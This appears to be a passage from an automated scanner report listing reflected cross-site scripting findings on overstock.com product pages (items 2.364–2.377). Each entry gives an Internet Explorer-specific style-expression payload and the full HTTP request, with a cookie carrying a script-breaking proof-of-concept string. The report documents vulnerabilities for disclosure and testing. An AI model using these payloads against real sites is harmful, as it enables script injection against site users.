GET /Home-Garden/Square-Sail-Sun-Shade/1736556/product.html?95fcd"style%3d"x%3aexpression(alert(1))"8af82f37e6b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.364. http://www.overstock.com/Home-Garden/Stanley-Queen-size-Bed/2656280/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9099c"style%3d"x%3aexpression(alert(1))"a9bfb42681e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9099c"style="x:expression(alert(1))"a9bfb42681e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Stanley-Queen-size-Bed/2656280/product.html?9099c"style%3d"x%3aexpression(alert(1))"a9bfb42681e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.365. http://www.overstock.com/Home-Garden/Stratton-5-piece-Dining-Set/4678291/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3851c"style%3d"x%3aexpression(alert(1))"c1c75c5bb41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3851c"style="x:expression(alert(1))"c1c75c5bb41 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Stratton-5-piece-Dining-Set/4678291/product.html?3851c"style%3d"x%3aexpression(alert(1))"c1c75c5bb41=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9675"style%3d"x%3aexpression(alert(1))"8fe436bab52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d9675"style="x:expression(alert(1))"8fe436bab52 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Student-Desk-White/2542757/product.html?d9675"style%3d"x%3aexpression(alert(1))"8fe436bab52=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.367. http://www.overstock.com/Home-Garden/Superior-Hard-Surface-and-Carpet-Rug-Pad-8-x-10/2663174/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81eaa"style%3d"x%3aexpression(alert(1))"5eca30ccd8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81eaa"style="x:expression(alert(1))"5eca30ccd8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Superior-Hard-Surface-and-Carpet-Rug-Pad-8-x-10/2663174/product.html?81eaa"style%3d"x%3aexpression(alert(1))"5eca30ccd8c=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.368. http://www.overstock.com/Home-Garden/Supreme-1200-gram-Cotton-Bath-Mats-Set-of-2/3452271/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b78f4"style%3d"x%3aexpression(alert(1))"f23d03f09ad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b78f4"style="x:expression(alert(1))"f23d03f09ad in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Supreme-1200-gram-Cotton-Bath-Mats-Set-of-2/3452271/product.html?b78f4"style%3d"x%3aexpression(alert(1))"f23d03f09ad=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.369. http://www.overstock.com/Home-Garden/Supreme-800-gram-Cotton-Bath-Sheets-Set-of-2/3452512/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45dff"style%3d"x%3aexpression(alert(1))"2b6b250e26a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45dff"style="x:expression(alert(1))"2b6b250e26a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Supreme-800-gram-Cotton-Bath-Sheets-Set-of-2/3452512/product.html?45dff"style%3d"x%3aexpression(alert(1))"2b6b250e26a=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.370. http://www.overstock.com/Home-Garden/Supreme-800-gram-Egyptian-Cotton-Towels-6-piece-Set/3450273/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e68af"style%3d"x%3aexpression(alert(1))"7fb48bbe14e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e68af"style="x:expression(alert(1))"7fb48bbe14e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Supreme-800-gram-Egyptian-Cotton-Towels-6-piece-Set/3450273/product.html?e68af"style%3d"x%3aexpression(alert(1))"7fb48bbe14e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.371. http://www.overstock.com/Home-Garden/Supreme-Warmth-Fleece-Blanket/1033157/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee09c"style%3d"x%3aexpression(alert(1))"71c13b0d630 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ee09c"style="x:expression(alert(1))"71c13b0d630 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Supreme-Warmth-Fleece-Blanket/1033157/product.html?ee09c"style%3d"x%3aexpression(alert(1))"71c13b0d630=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.372. http://www.overstock.com/Home-Garden/Sure-Fit-Smooth-Suede-Washable-Sofa-Slipcover/2278569/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8580f"style%3d"x%3aexpression(alert(1))"e92304d003d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8580f"style="x:expression(alert(1))"e92304d003d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Sure-Fit-Smooth-Suede-Washable-Sofa-Slipcover/2278569/product.html?8580f"style%3d"x%3aexpression(alert(1))"e92304d003d=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.373. http://www.overstock.com/Home-Garden/Sweep-It-25-inch-Lawn-Sweeper/3848184/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da9a1"style%3d"x%3aexpression(alert(1))"36e465ab857 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da9a1"style="x:expression(alert(1))"36e465ab857 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Sweep-It-25-inch-Lawn-Sweeper/3848184/product.html?da9a1"style%3d"x%3aexpression(alert(1))"36e465ab857=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.374. http://www.overstock.com/Home-Garden/Tabouret-24-inch-Metal-Counter-Stools-Set-of-2/3879160/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5451"style%3d"x%3aexpression(alert(1))"ac1e5ada514 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d5451"style="x:expression(alert(1))"ac1e5ada514 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Tabouret-24-inch-Metal-Counter-Stools-Set-of-2/3879160/product.html?d5451"style%3d"x%3aexpression(alert(1))"ac1e5ada514=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.375. http://www.overstock.com/Home-Garden/Thomas-Cast-Aluminum-Dark-Gold-3-piece-Bistro-Set/4860423/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd689"style%3d"x%3aexpression(alert(1))"c623320df37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fd689"style="x:expression(alert(1))"c623320df37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Thomas-Cast-Aluminum-Dark-Gold-3-piece-Bistro-Set/4860423/product.html?fd689"style%3d"x%3aexpression(alert(1))"c623320df37=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.376. http://www.overstock.com/Home-Garden/Tommy-Hilfiger-4-piece-Printed-Flannel-Sheet-Set/4458638/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbe0a"style%3d"x%3aexpression(alert(1))"9e712cffc8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cbe0a"style="x:expression(alert(1))"9e712cffc8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Home-Garden/Tommy-Hilfiger-4-piece-Printed-Flannel-Sheet-Set/4458638/product.html?cbe0a"style%3d"x%3aexpression(alert(1))"9e712cffc8e=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.377. http://www.overstock.com/Home-Garden/Tommy-Hilfiger-American-Classics-Navy-3-piece-Comforter-Set/3987252/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cd96"style%3d"x%3aexpression(alert(1))"f09ac549513 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6cd96"style="x:expression(alert(1))"f09ac549513 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
